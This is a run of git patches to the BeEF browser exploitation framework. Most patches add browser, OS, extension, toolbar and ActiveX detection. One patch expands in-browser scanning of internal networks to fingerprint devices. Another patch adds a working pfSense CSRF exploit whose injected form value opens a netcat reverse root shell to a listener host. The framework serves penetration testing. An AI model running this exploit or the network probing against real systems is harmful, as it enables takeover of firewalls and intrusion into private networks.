@@ -497,6 +505,7 @@ beef.browser = {
 			C21:	this.isC21(),	// Chrome 21
 			C22:	this.isC22(),	// Chrome 22
             C23:	this.isC23(),	// Chrome 23
+            C24:	this.isC24(),	// Chrome 24
 			C:	this.isC(), 	// Chrome any version
 
 			FF2:	this.isFF2(),	// Firefox 2
@@ -568,6 +577,7 @@ beef.browser = {
 		if (this.isC21())	{ return '21' };	// Chrome 21
 		if (this.isC22())   { return '22' };    // Chrome 22
         if (this.isC23())   { return '23' };    // Chrome 23
+        if (this.isC24())   { return '24' };    // Chrome 24
 
         if (this.isFF2())	{ return '2'  };	// Firefox 2
 		if (this.isFF3())	{ return '3'  };	// Firefox 3

From 8d151fb81830dc6fcd8f4ffb812f5a23f96a2516 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 25 Jan 2013 12:34:04 +1030
Subject: [PATCH 163/397] Add HTTPS support for
 `internal_network_fingerprinting` module

Comment out a few fingerprints for 'rare' software in order to increase
speed
---
 .../command.js                                | 235 +++++++++++++-----
 1 file changed, 174 insertions(+), 61 deletions(-)

diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js
index ac04bc0ef..168626f85 100644
--- a/modules/network/internal_network_fingerprinting/command.js
+++ b/modules/network/internal_network_fingerprinting/command.js
@@ -9,7 +9,7 @@ beef.execute(function() {
     var dom = document.createElement('b');
     var ips = new Array();
     ipRange = "<%= @ipRange %>";
-    ports = "<%= @ports %>";
+    ports   = "<%= @ports %>";
     if(ports != null){
       ports = ports.split(',');
     }
@@ -17,7 +17,7 @@ beef.execute(function() {
     if(ipRange != null){
         // ipRange will be in the form of 192.168.0.1-192.168.0.254: the fourth octet will be iterated.
         // (only C class IPs are supported atm)
-        ipBounds = ipRange.split('-');
+        ipBounds   = ipRange.split('-');
         lowerBound = ipBounds[0].split('.')[3];
         upperBound = ipBounds[1].split('.')[3];
 
@@ -47,72 +47,185 @@ beef.execute(function() {
         ];
     }
 
+    /* URLs in the form of:
+	"Dev/App Name", -- string
+	"Default Port", -- string
+	"Protocol",     -- string -- http/https
+	"Use Multiple Ports if specified", -- boolean
+	"IMG path",     -- string -- file path
+	"IMG width",    -- integer
+	"IMG height"    -- integer
+    */
     var urls = new Array(
-    // in the form of: "Dev/App Name","Default Port","Use Multiple Ports if specified","IMG url","IMG width","IMG height"
-	new Array("Apache",":80",false,"/icons/apache_pb.gif",259,32),
-	new Array("Apache 2.x",":80",false,"/icons/apache_pb2.gif",259,32),
-	new Array("Microsoft IIS 7.x",":80",false,"/welcome.png",571,411),
-	new Array("Microsoft IIS",":80",false,"/pagerror.gif",36,48),
-	new Array("QNAP NAS",":8080",false,"/ajax_obj/img/running.gif",16,16),
-	new Array("QNAP NAS",":8080",false,"/ajax_obj/images/qnap_logo_w.gif",115,21),
-	new Array("Belkin Router",":80",false,"/images/title_2.gif",321,28),
-	new Array("Billion Router",":80",false,"/customized/logo.gif",318,69),
-	new Array("Billion Router",":80",false,"/customized/logo.gif",224,55),
-	new Array("SMC Networks",":80",false,"/images/logo.gif",133,59),
-	new Array("Linksys NAS",":80",false,"/Admin_top.JPG",750,52),
-	new Array("Linksys NAS",":80",false,"/logo.jpg",194,52),
-	new Array("Linksys Network Camera",":80",false,"/welcome.jpg",146,250),
-	new Array("Linksys Wireless-G Camera",":80",false,"/header.gif",750,97),
-	new Array("Cisco IP Phone",":80",false,"/Images/Logo",120,66),
-	new Array("Snom Phone",":80",false,"/img/snom_logo.png",168,62),
-	new Array("Dell Laser Printer",":80",false,"/ews/images/delllogo.gif",100,100),
-	new Array("Brother Printer",":80",false,"/pbio/brother.gif",144,52),
-	new Array("HP LaserJet Printer",":80",false,"/hp/device/images/logo.gif",42,27),
-	new Array("HP LaserJet Printer",":80",false,"/hp/device/images/hp_invent_logo.gif",160,52),
-	new Array("JBoss Application server",":8080",true,"/images/logo.gif",226,105),
-	new Array("Siemens Simatic",":80",false,"/Images/Siemens_Firmenmarke.gif",115,76),
-	new Array("APC InfraStruXure Manager",":80",false,"/images/Xlogo_Layer-1.gif",342,327),
-	new Array("Barracuda Spam/Virus Firewall",":8000",true,"/images/powered_by.gif",211,26),
-	new Array("TwonkyMedia Server",":9000",false,"/images/TwonkyMediaServer_logo.jpg",150,82),
-	new Array("Alt-N MDaemon World Client",":3000",false,"/LookOut/biglogo.gif",342,98),
-	new Array("VLC Media Player",":8080",false,"/images/white_cross_small.png",9,9),
-	new Array("VMware ESXi Server",":80",false,"/background.jpeg",1,1100),
-	new Array("Microsoft Remote Web Workplace",":80",false,"/Remote/images/submit.gif",31,31),
-	new Array("XAMPP",":80",false,"/xampp/img/xampp-logo-new.gif",200,59),
-	new Array("Xerox Printer",":80",false,"/printbut.gif",30,30),
-	new Array("Konica Minolta Printer",":80",false,"/G27_light.gif",206,26),
-	new Array("Epson Printer",":80",false,"/cyandot.gif",1,1),
-	new Array("HP Printer",":80",false,"/hp/device/images/hp_invent_logo.gif",160,52),
-	new Array("Syncrify",":5800",false,"/images/468x60.gif",468,60),
-	new Array("Winamp Web Interface",":80",false,"/img?image=121",30,30),
-	new Array("Zenoss Core",":8080",false,"/zport/dmd/favicon.ico",16,16),
-	new Array("BeEF",":3000",false,"/ui/media/images/beef.png",200,149),
-	new Array("BeEF (PHP)",":80",false,"/beef/images/beef.gif",32,32),
-	new Array("Wordpress",":80",false,"/wp-includes/images/wpmini-blue.png",16,16),
-	new Array("Glassfish Server",":4848",false,"/theme/com/sun/webui/jsf/suntheme/images/login/gradlogsides.jpg", 1, 200)
+	new Array(
+		"Apache",
+		"80","http",false,
+		"/icons/apache_pb.gif",259,32),
+	new Array(
+		"Apache 2.x",
+		"80","http",false,
+		"/icons/apache_pb2.gif",259,32),
+	new Array(
+		"Microsoft IIS 7.x",
+		"80","http",false,
+		"/welcome.png",571,411),
+	new Array(
+		"Microsoft IIS",
+		"80","http",false,
+		"/pagerror.gif",36,48),
+	new Array(
+		"QNAP NAS",
+		"8080","http",false,
+		"/ajax_obj/img/running.gif",16,16),
+	new Array(
+		"QNAP NAS",
+		"8080","http",false,
+		"/ajax_obj/images/qnap_logo_w.gif",115,21),
+	new Array(
+		"Belkin Router",
+		"80","http",false,
+		"/images/title_2.gif",321,28),
+	new Array(
+		"Billion Router",
+		"80","http",false,
+		"/customized/logo.gif",318,69),
+	new Array(
+		"Billion Router",
+		"80","http",false,
+		"/customized/logo.gif",224,55),
+//	new Array("SMC Networks","80","http",false,"/images/logo.gif",133,59),
+	new Array(
+		"Linksys NAS",
+		"80","http",false,
+		"/Admin_top.JPG",750,52),
+	new Array(
+		"Linksys NAS",
+		"80","http",false,
+		"/logo.jpg",194,52),
+	new Array(
+		"Linksys Network Camera",
+		"80","http",false,
+		"/welcome.jpg",146,250),
+	new Array(
+		"Linksys Wireless-G Camera",
+		"80","http",false,
+		"/header.gif",750,97),
+	new Array(
+		"Cisco IP Phone",
+		"80","http",false,
+		"/Images/Logo",120,66),
+	new Array(
+		"Snom Phone",
+		"80","http",false,
+		"/img/snom_logo.png",168,62),
+	new Array(
+		"Dell Laser Printer",
+		"80","http",false,
+		"/ews/images/delllogo.gif",100,100),
+	new Array(
+		"Brother Printer",
+		"80","http",false,
+		"/pbio/brother.gif",144,52),
+	new Array(
+		"HP LaserJet Printer",
+		"80","http",false,
+		"/hp/device/images/logo.gif",42,27),
+	new Array(
+		"HP LaserJet Printer",
+		"80","http",false,
+		"/hp/device/images/hp_invent_logo.gif",160,52),
+	new Array(
+		"JBoss Application server",
+		"8080","http",true,
+		"/images/logo.gif",226,105),
+//	new Array("Siemens Simatic","80",false,"/Images/Siemens_Firmenmarke.gif",115,76),
+	new Array(
+		"APC InfraStruXure Manager",
+		"80","http",false,
+		"/images/Xlogo_Layer-1.gif",342,327),
+	new Array(
+		"Barracuda Spam/Virus Firewall",
+		"8000","http",true,
+		"/images/powered_by.gif",211,26),
+	new Array(
+		"TwonkyMedia Server",
+		"9000","http",false,
+		"/images/TwonkyMediaServer_logo.jpg",150,82),
+//	new Array("Alt-N MDaemon World Client","3000","http",false,"/LookOut/biglogo.gif",342,98),
+//	new Array("VLC Media Player","8080","http",false,"/images/white_cross_small.png",9,9),
+	new Array(
+		"VMware ESXi Server",
+		"80","http",false,
+		"/background.jpeg",1,1100),
+	new Array(
+		"Microsoft Remote Web Workplace",
+		"80","http",false,
+		"/Remote/images/submit.gif",31,31),
+	new Array(
+		"XAMPP",
+		"80","http",false,
+		"/xampp/img/xampp-logo-new.gif",200,59),
+	new Array(
+		"Xerox Printer",
+		"80","http",false,
+		"/printbut.gif",30,30),
+	new Array(
+		"Konica Minolta Printer",
+		"80","http",false,
+		"/G27_light.gif",206,26),
+	new Array(
+		"Epson Printer",
+		"80","http",false,
+		"/cyandot.gif",1,1),
+	new Array(
+		"HP Printer",
+		"80","http",false,
+		"/hp/device/images/hp_invent_logo.gif",160,52),
+//	new Array("Syncrify","5800","http",false,"/images/468x60.gif",468,60),
+//	new Array("Winamp Web Interface","80","http",false,"/img?image=121",30,30),
+	new Array(
+		"Zenoss",
+		"8080","http",false,
+		"/zport/dmd/favicon.ico",16,16),
+	new Array(
+		"BeEF",
+		"3000","http",false,
+		"/ui/media/images/beef.png",200,149),
+	new Array(
+		"BeEF (PHP)",
+		"80","http",false,
+		"/beef/images/beef.gif",32,32),
+	new Array(
+		"Wordpress",
+		"80","http",true,
+		"/wp-includes/images/wpmini-blue.png",16,16),
+	new Array(
+		"Glassfish Server",
+		"4848","http",false,
+		"/theme/com/sun/webui/jsf/suntheme/images/login/gradlogsides.jpg", 1, 200)
 	);
 
 	// for each ip
 	for(var i=0; i < ips.length; i++) {
 		// for each url
 		for(var u=0; u < urls.length; u++) {
-            if(!urls[u][2] && ports != null){ // use default port
-                var img = new Image;
-                //console.log("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "]");
-                img.id = u;
-                img.src = "http://"+ips[i]+urls[u][1]+urls[u][3];
-                img.onload = function() { if (this.width == urls[this.id][4] && this.height == urls[this.id][5]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
-                dom.appendChild(img);
-            }else{ // iterate to all the specified ports
-                for(p=0;p<ports.length;p++){
-                    var img = new Image;
-                    //console.log("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
-                    img.id = u;
-                    img.src = "http://"+ips[i]+":"+ports[p]+urls[u][3];
-                    img.onload = function() { if (this.width == urls[this.id][4] && this.height == urls[this.id][5]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
-                    dom.appendChild(img);
-                }
-            }
+			if(!urls[u][3] && ports != null){ // use default port
+				var img = new Image;
+				//console.log("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "]");
+				img.id  = u;
+				img.src = urls[u][2]+"://"+ips[i]+":"+urls[u][1]+urls[u][4];
+				img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
+				dom.appendChild(img);
+			} else { // iterate to all the specified ports
+				for(p=0;p<ports.length;p++){
+					var img = new Image;
+					//console.log("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
+					img.id  = u;
+					img.src = urls[u][2]+"://"+ips[i]+":"+ports[p]+urls[u][4];
+					img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
+					dom.appendChild(img);
+				}
+			}
 		}
 	}
 });

From 1ad6039f0a765e283c3273a3538f2cebedb4b704 Mon Sep 17 00:00:00 2001
From: bmantra <bart.leppens@gmail.com>
Date: Fri, 25 Jan 2013 19:52:09 +0100
Subject: [PATCH 164/397] fingerprint network detect pfSense

---
 modules/network/internal_network_fingerprinting/command.js | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js
index 168626f85..ba9eb6301 100644
--- a/modules/network/internal_network_fingerprinting/command.js
+++ b/modules/network/internal_network_fingerprinting/command.js
@@ -202,7 +202,11 @@ beef.execute(function() {
 	new Array(
 		"Glassfish Server",
 		"4848","http",false,
-		"/theme/com/sun/webui/jsf/suntheme/images/login/gradlogsides.jpg", 1, 200)
+		"/theme/com/sun/webui/jsf/suntheme/images/login/gradlogsides.jpg", 1, 200),
+	new Array(
+		"pfSense",
+		"443","https",false,
+		"/themes/pfsense_ng/images/logo.gif",200,56)
 	);
 
 	// for each ip

From 8cd570c62d24596175387d2c06ccffe50b8254d4 Mon Sep 17 00:00:00 2001
From: bmantra <bart.leppens@gmail.com>
Date: Fri, 25 Jan 2013 21:05:43 +0100
Subject: [PATCH 165/397] pfsense reverse root shell exploit #812

---
 modules/exploits/pfsense/command.js  | 24 ++++++++++++++++++++++++
 modules/exploits/pfsense/config.yaml | 15 +++++++++++++++
 modules/exploits/pfsense/module.rb   | 24 ++++++++++++++++++++++++
 3 files changed, 63 insertions(+)
 create mode 100644 modules/exploits/pfsense/command.js
 create mode 100644 modules/exploits/pfsense/config.yaml
 create mode 100644 modules/exploits/pfsense/module.rb

diff --git a/modules/exploits/pfsense/command.js b/modules/exploits/pfsense/command.js
new file mode 100644
index 000000000..4b596a099
--- /dev/null
+++ b/modules/exploits/pfsense/command.js
@@ -0,0 +1,24 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+
+  var pfsense_iframe = beef.dom.createIframeXsrfForm("https://" + rhost + ":" + rport +"/system_firmware.php", "POST",
+    [{'type':'hidden', 'name':'kerneltype', 'value':'SMP > /boot/kernel/pfsense_kernel.txt;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ' + lhost + ' ' + lport + ' >/tmp/f &'}]);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(pfsense_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/pfsense/config.yaml b/modules/exploits/pfsense/config.yaml
new file mode 100644
index 000000000..defde80f8
--- /dev/null
+++ b/modules/exploits/pfsense/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        pfsense_reverse_root_shell_csrf:
+            enable: true
+            category: "Exploits"
+            name: "pfSense Reverse Root Shell CSRF"
+            description: "Attempts to get a reverse root shell on a pfSense 2.0.1 firewall/router.<br />Vulnerablity found and PoC provided by Yann CAM @ Synetis.<br />The method described by <a href='http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet'>Jeff Price</a> has been used to create a reverse shell with netcat.<br />For more information refer to <a href='http://www.exploit-db.com/exploits/23901/'>http://www.exploit-db.com/exploits/23901/</a><br />Patched in version 2.0.2."
+            authors: ["bmantra"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/pfsense/module.rb b/modules/exploits/pfsense/module.rb
new file mode 100644
index 000000000..8e7829ca4
--- /dev/null
+++ b/modules/exploits/pfsense/module.rb
@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Pfsense_reverse_root_shell_csrf < BeEF::Core::Command
+  
+	def self.options
+		configuration = BeEF::Core::Configuration.instance
+		lhost = "#{configuration.get("beef.http.host")}"
+		lhost = "" if lhost == "0.0.0.0"
+		return [
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, 
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '443' },
+			{ 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost},
+			{ 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

From 29480a24dac3b3f622add8378145d151842a6ebf Mon Sep 17 00:00:00 2001
From: Wade Alcorn <wade@bindshell.net>
Date: Sun, 27 Jan 2013 14:40:16 +1000
Subject: [PATCH 166/397] Version number updated

---
 VERSION     | 2 +-
 config.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/VERSION b/VERSION
index 8a77ec1e3..842f2e0d2 100644
--- a/VERSION
+++ b/VERSION
@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.1-alpha
+0.4.4.2-alpha
diff --git a/config.yaml b/config.yaml
index a1f025663..75a8e02ea 100644
--- a/config.yaml
+++ b/config.yaml
@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.1-alpha'
+    version: '0.4.4.2-alpha'
     debug: false
 
     restrictions:

From e8d85b550b6df1c5de1040861d9597a4635d2338 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 27 Jan 2013 22:35:14 +1030
Subject: [PATCH 167/397] Rename "Detect Chrome/Firefox Extensions" module to
 "Detect Extensions"

Added placeholder for IE toolbar detection
---
 modules/browser/detect_extensions/command.js  | 17 +++++++++++++----
 modules/browser/detect_extensions/config.yaml |  4 ++--
 2 files changed, 15 insertions(+), 6 deletions(-)

diff --git a/modules/browser/detect_extensions/command.js b/modules/browser/detect_extensions/command.js
index 660530ab3..1ae81109d 100644
--- a/modules/browser/detect_extensions/command.js
+++ b/modules/browser/detect_extensions/command.js
@@ -1086,15 +1086,24 @@ beef.execute(function() {
                         for (var i=0; i<chrome_extensions.length; i++) {
                                 detect_chrome_extension(chrome_extensions[i][0], chrome_extensions[i][1]);
                         }
-                } catch(e) {}
+                } catch(e) {
+                        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Chrome extensions failed');
+                }
         } else if(beef.browser.isFF()) {
                 try {
                         for (var i in firefox_extensions) {
                                 detect_firefox_extension(firefox_extensions[i], i);
                         }
-                } catch(e) {}
-        } else {
-        };
+                } catch(e) {
+                        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Firefox extensions failed');
+                }
+        } else if(beef.browser.isIE()) {
+                try {
+                        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Internet Explorer extensions is not supported');
+                } catch(e) {
+                        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Internet Explorer extensions failed');
+                }
+        }
 
 });
 
diff --git a/modules/browser/detect_extensions/config.yaml b/modules/browser/detect_extensions/config.yaml
index af923f60b..1f717b7a1 100644
--- a/modules/browser/detect_extensions/config.yaml
+++ b/modules/browser/detect_extensions/config.yaml
@@ -8,8 +8,8 @@ beef:
         detect_extensions:
             enable: true
             category: "Browser"
-            name: "Detect Chrome/Firefox Extensions"
-            description: "This module detects Extensions in Chrome and Firefox "
+            name: "Detect Extensions"
+            description: "This module detects extensions installed in Google Chrome and Mozilla Firefox."
             authors: ["koto", "bcoles", "nbblrr"]
             target:
                 working:

From 3cb7bb9f51e3142da2535cbde3cc8525cccf472f Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 28 Jan 2013 01:01:29 +1030
Subject: [PATCH 168/397] Add support for Windows 8

---
 core/main/client/os.js | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/core/main/client/os.js b/core/main/client/os.js
index eeba7ebe6..a9361f962 100644
--- a/core/main/client/os.js
+++ b/core/main/client/os.js
@@ -47,6 +47,9 @@ beef.os = {
 	isWin7: function() {
 		return (this.ua.match('(Windows NT 6.1)|(Windows NT 7.0)')) ? true : false;
 	},
+	isWin8: function() {
+		return (this.ua.match('(Windows NT 6.2)')) ? true : false;
+	},
 	
 	isOpenBSD: function() {
 		return (this.ua.indexOf('OpenBSD') != -1) ? true : false;
@@ -116,6 +119,7 @@ beef.os = {
 		if(this.isWinServer2003()) return 'Windows Server 2003';
 		if(this.isWinVista()) return 'Windows Vista';
 		if(this.isWin7()) return 'Windows 7';
+		if(this.isWin8()) return 'Windows 8';
 
 		//Nokia
 		if(this.isNokia()) {

From 209e64a9ef8487ed59b72ea80453061a937f3175 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 28 Jan 2013 01:02:53 +1030
Subject: [PATCH 169/397] Add IE 7-9 detection to browser_fingerprinting module

---
 modules/browser/browser_fingerprinting/command.js | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/browser/browser_fingerprinting/command.js b/modules/browser/browser_fingerprinting/command.js
index bacb3f418..e60b5df5e 100644
--- a/modules/browser/browser_fingerprinting/command.js
+++ b/modules/browser/browser_fingerprinting/command.js
@@ -35,6 +35,7 @@ beef.execute(function() {
 		new Array("Firefox","7+","resource:///chrome/browser/content/browser/aboutHome-snippet1.png"),
 		new Array("Firefox","8+","resource:///chrome/browser/skin/classic/aero/browser/Toolbar-inverted.png"),
 		new Array("Internet Explorer","5-6","res://shdoclc.dll/pagerror.gif"),
+		new Array("Internet Explorer","7-9","res://ieframe.dll/ielogo.png"),
 		new Array("Internet Explorer","7+","res://ieframe.dll/info_48.png")
 	);
 

From c085c2d3d7f9d044e3b2967f117af180072afa1a Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 28 Jan 2013 01:05:31 +1030
Subject: [PATCH 170/397] Add detection for IE10

Fixes issue #818
---
 core/main/client/browser.js | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index a5089585a..d5ff7c7bb 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -48,7 +48,7 @@ beef.browser = {
 	 * @example: beef.browser.isIE9()
 	 */
 	isIE9: function() {
-		return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance;
+		return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints === "undefined";
 	},
 
 	/**
@@ -56,9 +56,8 @@ beef.browser = {
 	 * Returns true if IE10.
 	 * @example: beef.browser.isIE10()
 	 */
-	 // placeholder
 	isIE10: function() {
-		return false;
+		return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints !== "undefined";
 	},
 
 	/**

From daadf597828e163d68e9f1621084e5c8fe146220 Mon Sep 17 00:00:00 2001
From: gcatt <giov.catt@gmail.com>
Date: Thu, 31 Jan 2013 09:20:32 +0100
Subject: [PATCH 171/397] Module: Detect Toolbars

Added a module to detect browser toolbars by checking the User-Agent
and the DOM
---
 .gitignore                                  |  7 ++-
 modules/browser/detect_toolbars/command.js  | 61 +++++++++++++++++++++
 modules/browser/detect_toolbars/config.yaml | 16 ++++++
 modules/browser/detect_toolbars/module.rb   | 14 +++++
 4 files changed, 97 insertions(+), 1 deletion(-)
 create mode 100644 modules/browser/detect_toolbars/command.js
 create mode 100644 modules/browser/detect_toolbars/config.yaml
 create mode 100644 modules/browser/detect_toolbars/module.rb

diff --git a/.gitignore b/.gitignore
index c02e0a406..0801089b3 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,8 @@
 beef.db
 test/msf-test
-custom-config.yaml
\ No newline at end of file
+custom-config.yaml
+.DS_Store
+
+.gitignore
+
+.gitignore
diff --git a/modules/browser/detect_toolbars/command.js b/modules/browser/detect_toolbars/command.js
new file mode 100644
index 000000000..681e718cc
--- /dev/null
+++ b/modules/browser/detect_toolbars/command.js
@@ -0,0 +1,61 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+	
+	var toolbar_ua = new Array (
+		new Array (" Alexa Toolbar", " Alexa"),
+		new Array (" AskTbS-PV", " Ask"),
+		new Array (" BRI", " Bing"),
+		new Array (" GTB", " Google"),
+		new Array (" SU ", " Stumble Upon")
+		)
+		
+	var toolbar_id = new Array (
+		new Array ("AlexaCustomScriptId", " Alexa")
+		)	
+
+	var result = '';
+	var separator = ", ";
+    
+	// CHECK USER-AGENT
+	for (var i = 0; i < toolbar_ua.length; i++) {
+		
+		var agentRegex = new RegExp( toolbar_ua[i][0], 'g' );
+		
+		if ( agentRegex.exec(navigator.userAgent) ) {
+			
+			result += toolbar_ua[i][1] + separator;			
+			
+		}
+	}
+	
+	// CHECK ELEMENT ID (DOM)
+	for (var i = 0; i < toolbar_id.length; i++) {
+		
+		var element =  document.getElementById( toolbar_id[i][0] );
+		
+		if ( typeof(element) != 'undefined' && element != null ) {
+			
+			result += toolbar_id[i][1] + separator;
+			
+		}
+	}
+
+	// ENDING
+	if ( result != '' ) {
+		
+		result = result.slice(0, -separator.length);
+		
+	} else if ( result == '' ) {
+		
+		result = " no toolbars detected";
+		
+	}
+	
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "toolbars="+result);	
+	
+});
\ No newline at end of file
diff --git a/modules/browser/detect_toolbars/config.yaml b/modules/browser/detect_toolbars/config.yaml
new file mode 100644
index 000000000..de53eabf7
--- /dev/null
+++ b/modules/browser/detect_toolbars/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        Detect_toolbars:
+            enable: true
+            category: "Browser"
+            name: "Detect Toolbars"
+            description: "Detects which browser toolbars are installed."
+            authors: ["gcattani"]
+            target:
+                working: ["All"]
+                not_working: ["None"]
diff --git a/modules/browser/detect_toolbars/module.rb b/modules/browser/detect_toolbars/module.rb
new file mode 100644
index 000000000..dbf8b0766
--- /dev/null
+++ b/modules/browser/detect_toolbars/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_toolbars < BeEF::Core::Command
+  
+  def post_execute
+    content = {}
+    content['toolbars'] = @datastore['toolbars']
+    save content
+  end
+
+end
\ No newline at end of file

From 06221d2540aaabd66572f2026410afe7bffb838f Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 1 Feb 2013 01:06:31 +1030
Subject: [PATCH 172/397] cleanup .gitignore

---
 .gitignore | 3 ---
 1 file changed, 3 deletions(-)

diff --git a/.gitignore b/.gitignore
index 0801089b3..26a021ee6 100644
--- a/.gitignore
+++ b/.gitignore
@@ -2,7 +2,4 @@ beef.db
 test/msf-test
 custom-config.yaml
 .DS_Store
-
-.gitignore
-
 .gitignore

From 61d0bf2e145e5d0ec3932e721dc967650aa83fd8 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 1 Feb 2013 01:22:45 +1030
Subject: [PATCH 173/397] Add beef.browser.hasActiveX()

Add modules/browser/detect_activex module

Fix issue #832
---
 core/main/client/browser.js                |  9 ++++++++-
 modules/browser/detect_activex/command.js  | 14 ++++++++++++++
 modules/browser/detect_activex/config.yaml | 16 ++++++++++++++++
 modules/browser/detect_activex/module.rb   | 14 ++++++++++++++
 4 files changed, 52 insertions(+), 1 deletion(-)
 create mode 100644 modules/browser/detect_activex/command.js
 create mode 100644 modules/browser/detect_activex/config.yaml
 create mode 100644 modules/browser/detect_activex/module.rb

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index d5ff7c7bb..c82ca82d5 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -976,7 +976,7 @@ beef.browser = {
 		var has_phonegap = (beef.browser.hasPhonegap())? "Yes" : "No";
 		var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No";
 		var has_web_socket=(beef.browser.hasWebSocket())? "Yes":"No";
-		var has_activex = (typeof(window.ActiveXObject) != "undefined") ? "Yes":"No";
+		var has_activex = (beef.browser.hasActiveX())? "Yes":"No";
 		var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie"))? "Yes":"No";
 		var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie"))? "Yes":"No";
 
@@ -1010,6 +1010,13 @@ beef.browser = {
 		return details;
 	},
 
+	/**
+	 * Returns boolean value depending on whether the browser support ActiveX
+	 */
+	hasActiveX: function() {
+		return (typeof(window.ActiveXObject) != "undefined");
+	},
+
 	/**
 	 * Returns array of results, whether or not the target zombie has visited the specified URL
 	 */
diff --git a/modules/browser/detect_activex/command.js b/modules/browser/detect_activex/command.js
new file mode 100644
index 000000000..5db6fc0f1
--- /dev/null
+++ b/modules/browser/detect_activex/command.js
@@ -0,0 +1,14 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
